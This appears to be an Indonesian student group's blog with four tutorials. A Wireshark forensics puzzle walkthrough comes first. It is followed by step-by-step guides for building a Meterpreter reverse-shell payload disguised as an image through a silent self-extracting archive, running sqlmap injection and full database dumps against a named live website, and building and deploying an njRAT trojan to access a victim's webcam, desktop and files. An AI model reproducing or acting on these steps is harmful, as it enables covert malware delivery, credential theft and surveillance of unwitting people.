Minggu, 23 Desember 2018

Tutorial Digital Forensik dengan Wireshark di Kali Linux (Kelompok Sistem Keamanan Komputer)


M Fari Caesaradha   1715015051
Sholatul Rachmad    1715015053
Akhmad Masyudi     1715015055
Fikri Syifa Maulidin 1715015062
Wahyu Ramadhani    1715015079
TUTORIAL WIRESHARK

Pertama untuk melakukan digital forensic di WireShark anda harus memiliki file .pcap terlebih dahulu, pcap merupakan file packet-packet jaringan dan Wireshark yang sudah terinstall bersama Kali Linux. Kali ini kami akan menjelaskan bagaimana menggunakan wireshark dalam digital forensik dengan kasus Ann’s Apple TV. Ann’s Apple TV merupakan salah satu puzzle yang digunakan dalam kontes forensik  (http://forensicscontest.com/puzzles) Kronologi Ann’s Apple TV adalah sebagai berikut :

Ann dan Mr.X telah menyusun tempat oparasi mereka yang baru. Sambil menunggu berkas-berkas selesai diproses, anda dan tim investigator anda diam-diam memonitor kegiatan Ann dan Mr.X. Baru-baru ini Ann membeli Apple TV, dan mengaturnya dengan ip statis 192.168.1.10.

Misi anda dan tim investigator anda adalah untuk mengetahui apa yang Ann cari, kesukaannya dan mencari barang bukti termasuk :
a.       Alamat MAC dari Apple TV milik Ann.
b.      User-agent apa yang digunakan Apple TV milik ann dalam HTTP request.
c.       Apa empat pencarian pertama Ann dalam Apple TV
d.      Apa judul film pertama yang Ann klik
e.      Apa link URL dari trailer film pertama yang Ann klik
f.        Apa judul film kedua yang Ann klik
g.       Berapa harga film kedua yang Ann klik
h.      Apa pencarian terakhir Ann
Dengan kronologi diatas kita sudah mendapat misi apa yang harus kita lakukan sebagai investigator. Langsung saja.

1.       Buka file .pcap menggunakan Wireshark

 

2.       Dari paket pertama sudah terlihat alamat MAC dari Apple TV milik Ann


Dari gambar terlihat alamat MAC dari Apple TV adalah (00:25:00:fe:07:c4)

3.       Selanjutnya untuk mencari user-agent cari paket yang memiliki protokol “HTML”



Dari situ klik kanan pada paket, pilih follow -> TCP Stream



Jendala baru akan muncul dan memperlihatkan bahwa user-agent yang digunakan Apple TV adalah (AppleTV/2.4)

4.       Untuk mencari pencarian yang dilakukan Ann, dalam tab filter masukkan (http.request.method == “GET”)


Filter ini digunakan untuk menampilkan paket-paket yang berjalan saat URL meminta data ke server, dari list yang ada di tab info cari “incremental search”



Jika ketemu klik dua kali dan jendela baru akan muncul menampilkan url yang dikirim saat melakukan pencarian.






Dari gambar diatas terlihat empat pencarian pertama yang dilakukan Ann adalah (h,ha,hac, dan hack).

5.       Selanjutnya untuk mencari nama film yang pertama diklik Ann, masih menggunakan list dari langkah 4, di tab info cari “pageName”

 

Jika ketemu klik dua kali dan jendela baru akan muncul menampilkan url dengan nama film.



Dari gambar diatas diketahui bahwa film pertama yang diklik Ann adalah (Hackers).

6.       Untuk mencari link trailernya klik paket yang berada diatas paket film tadi lalu pilih follow -> TCP Stream


Dari list yang ada cari paket yang memiliki protokol “HTTP/XML” untuk melihat informasi-informasi halaman web yang dibuka.



Jika ketemu klik dua kali dan pada tab XML cari key yang bernilai “preview-url”. Dari gambar diatas diketahui link URL dari trailer film Hackers adalah (http://a227.v.phebos.apple.com/us/r1000/008/Video/62/bd/mzm.plqacyqb..640x278.h264lc.d2.p.m4v)

7.       Untuk mencari film kedua langkah yang dilakukan sama seperti saat mencari film pertama


Dari gambar diatas terlihat film kedua yang diklik oleh Ann adalah (Sneakers).

8.       Untuk mencari harga dari film Sneakers, sama seperti saat mencari link trailer film Hackers
Klik paket yang berada diatas paket film Sneakers, klik dua kali -> pilih follow -> TCP Streamer






Dari list yang ada cari paket yang memiliki protokol “HTTP/XML” untuk melihat informasi-informasi halaman web yang dibuka

Jika ketemu klik dua kali dan pada tab XML cari key yang bernilai “price”. Dari gambar diatas diketahui harga dari film Sneakers adalah (9.99 USD).

9.       Misi terakhir adalah mencari pencarian terakhir yang dilakukan Ann
Untuk mencari pencarian terakhir pilih paket terakhir di list paket langkah ke 4 lalu klik dua kali. Jendala baru akan muncul dan memperlihatkan pencarian terkahir yang dilakukan Ann.

 

Dari gambar diatas terlihat pencarian terakhir, yang dicari oleh Ann adalah (iknowyourewatchingme).

Setelah melakukan misi-misi diatas dapat disimpulkan bahwa:
a.       Alamat MAC dari Apple TV milik Ann. = 00:25:00:fe:07:c4
b.      User-agent apa yang digunakan Apple TV milik ann dalam HTTP request. = AppleTV/2.4
c.       Apa empat pencarian pertama Ann dalam Apple TV = h,ha,hac, dan hack
d.      Apa judul film pertama yang Ann klik = Hackers
e. Apa link URL dari trailer film pertama yang Ann klik = http://a227.v.phebos.apple.com/us/r1000/008/Video/62/bd/mzm.plqacyqb..640x278.h264lc.d2.p.m4v
f.        Apa judul film kedua yang Ann klik = Sneakers
g.       Berapa harga film kedua yang Ann klik = 9.99 USD
h.      Apa pencarian terakhir Ann = iknowyourewatchingme

Sekian dari kami terima kasih, coba lagi puzzle-puzzle disini (http://forensicscontest.com/puzzles) untuk mengasah kemampuan investigasi kalian.
TERIMA KASIH

Tutorial Eksploit Gambar dengan Metasploit di Kali Linux (Kelompok Sistem Keamanan Komputer)


M Fari Caesaradha   1715015051
Sholatul Rachmad    1715015053
Akhmad Masyudi     1715015055
Fikri Syifa Maulidin 1715015062
Wahyu Ramadhani    1715015079

TUTORIAL METASPLOIT
Metasploit adalah sebuah aplikasi yang digunakan untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Berikut langkah-langkahnya:

1.      Pertama untuk membuat eksploit gambar kita buat dahulu file eksploitnya. Untuk membuatnya kita gunakan perintah msfvenom yang merupakan perintah metasploit untuk membuat payload virus dan men-encode(menyandikan)-nya. Perintahnya seperti berikut
msfvenom –p windows/meterpreter/reverse_tcp LHOST=”ip komputer anda” LPORT=4444 –f exe > “namafile_virus”.exe

Note: untuk mengecek ip komputer, gunakan perintah ifconfig.
Setelah menjalankan perintah diatas file exe akan dibuat di folder HOME, disini saya menamai filenya “masyudi.exe”.

2.       Selanjutnya cari gambar yang kalian ingin jadikan menjadi eksploit dan pindahkan ke folder dimana file virus kalian berada.

3.       Buat juga icon untuk file virusnya dari file gambar tadi. Untuk membuat icon gunakan website https://convertico.co/jpeg-ico/


Note: Mulai dari sini sampai langkah 11 gunakan windows

4.       Lalu pilih file virus dan file gambar dan gabungkan dengan WinRAR



5.       Centang “Create SFX archive”



6.       Pilih tab Advanced, kemudian pilih SFX Options



7.       Di jendala SFX Options pilih tab setup dan masukkan nama file gambar dan file virus yang telah dibuat.



8.       Lalu pilih tab Modes, pada menu “Silent mode” pilih “Hide all”.



9.       Lalu pilih tab “Text and Icon”, pada menu “Load SFX icon” pilih icon yang telah dibuat.


10.   Kemudian klik “OK” dan file akan terbuat.


11.   Lalu pindahkan file yang telah dibuat ke komputer korban
12.   Kembali ke Kali Linux, masuk ke terminal dan ketikkan perintah
msfconsole
untuk masuk ke metasploit dan masukkan perintah berikut
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.11
set LPORT 4444
show option
exploit 





13.   Jika korban sudah menjalankan file maka exploit akan membuka sesi ke komputer korban
14.   Masukkan perintah screenshot untuk mengambil screenshot dari layar korban


15.   Masukkan perintah sysinfo untuk melihat informasi komputer korban.


TERIMA KASIH

Sabtu, 22 Desember 2018

Tutorial SQL Injection dengan SQLmap di Kali Linux (Kelompok Sistem Keamanan Komputer)



M Fari Caesaradha   1715015051
Sholatul Rachmad    1715015053
Akhmad Masyudi     1715015055
Fikri Syifa Maulidin 1715015062
Wahyu Ramadhani    1715015079

TUTORIAL SQLMAP

SQLmap adalah sebuah aplikasi yang digunakan untuk melakukan SQL Injection yaitu manipulasi database pada website yang di inject. Berikut langkah-langkahnya:

1.    Buka terminal, lalu masukkan perintah  sqlmap -u (url target yang ingin diinjeksi)   –dbs, setelah itu tekan enter. Perintah "-u" adalah "URL" target yang akan di eksekusi oleh sqlmap dan perintah "--dbs" merupakan perintah sqlmap untuk berusaha mencari database dari web yang dijadikan target. Disini target saya adalah http://apotekhar4.000webhostapp.com/edit_obat.php?id=66. Ketika sqlmap mendapat redirect ke index seperti dibawah masukkan saja perintah n.



Hasil injeksi database nya akan sebagai berikut. Disini saya mendapat 3 database.



2.     
Selanjutnya perintahnya  adalah sqlmap -u (url taget yang ingin diinjeksi) -D (database yang ingin diinjeksi) ––tables, lalu tekan enter. Disini target database yang ingin saya injeksi adalah database yang pertama.



Hasilnya adalah sebagai berikut. Disini saya mendapat 4 table.



3.     Selanjutnya perintahnya  adalah sqlmap -u (url taget yang ingin diinjeksi) -D (database yang ingin diinjeksi) –T (table yang ingin diinjeksi) ––columns, lalu tekan enter.



    Hasil injeksi nya akan sebagai berikut. Disini saya mendapat 6 kolom.



4.    Lalu langkah terakhir untuk melihat isi kolom kita menggunakan perintah --dump. perintahnya  adalah sqlmap -u (url taget yang ingin diinjeksi) -D (database yang ingin diinjeksi) –T (table yang ingin diinjeksi) –C (nama kolom) –dump. Pada contoh saya, saya menggunakan –dump-all untuk melihat seluruh isi kolomnya.



Yang hasilnya adalah sebagai berikut. Kita  bisa lihat dari id_akun sampai ke passwordnya.


Terima kasih sudah menyimak tutorial SQLmap sampai akhir. Selamat mencoba. J

Tutorial Remote Access dengan njRAT di Windows (Kelompok Sistem Keamanan Komputer)


M Fari Caesaradha   1715015051
Sholatul Rachmad    1715015053
Akhmad Masyudi     1715015055
Fikri Syifa Maulidin 1715015062
Wahyu Ramadhani    1715015079
TUTORIAL NJRAT

nJRat adalah sebuah aplikasi tools hacking pada sistem operasi windows yang digunakan untuk me-remote / me-monitor pc satu dengan yang lain. Pada tutorial ini saya menggunakan laptop saya sendiri sebagai host sekaligus korbannya, berikut langkah-langkahnya: 

1.      Matikan terlebih dahulu Windows Firewall.


2.      Setelah itu, matikan juga Windows Defender.


3.      Buka aplikasi nJRat.


4.      Setelah itu, atur port sesuai keinginan (disini saya pakai 5552) lalu klik “Start”



5.      Selesai atur port, Klik “Builder” yang ada dibawah, baru atur IP Host dan Exe name sesuai keinginan, jika sudah Klik “BUILD”


6.      Setelah di Build, akan disimpan hasilnya di tempat awal NjRat tersebut


7.      File NjRat sudah disiapkan, tinggal dikirim ke User lain (Syarat harus bisa terkoneksi di Satu LAN baru bisa diakses data User lain tersebut) disini saya mencoba di laptop saya sendiri.


8.      Setelah dibuka file nya, maka User lain tersebut berhasil di Hack, akan muncul data yang masuk.


9.      Disini kita bisa meng akses User victim tersebut, ada beberapa yang bisa diakses, mulai dari bisa mengakses kamera, desktop, dan lain-lain.


10 Pertama saya mengakses Kamera victim tersebut, dengan cara Klik kanan baru pilih “Remote Cam” maka kita bisa mengakses kamera user tersebut.

11.  Kedua saya akan mengakses Dekstop user, dengan cara Klik kanan setelah itu piliih “Remote Desktop”, maka kita bisa melihat Desktop user tersebut.


12.  Ketiga saya akan mengakses File data dari User tersebut, dengan cara Klik kanan setelah itu pilih “Manager”, maka kita bisa mengakses file data-data user tersebut.

13.  Kita bisa juga mengirim pesan ke user yang sudah di hack tersebut, dengan cara klik kanan baru pilih “Open Chat”, setelah itu kita bisa mengirim pesan sesuka kita ke User tersebut (Sebelah kiri warna merah adalah user victim, Sebelah kanan warna putih adalah Hacker).

Itulah beberapa tutorial nJRat, mohon maaf kalau ada salah kata-kata atau langkah-langkah diatas tersebut, Untuk pilihan-pilihan lainnya silahkan dicoba sendiri ya. Selamat mencoba. J
Sekian dan Terima Kasih.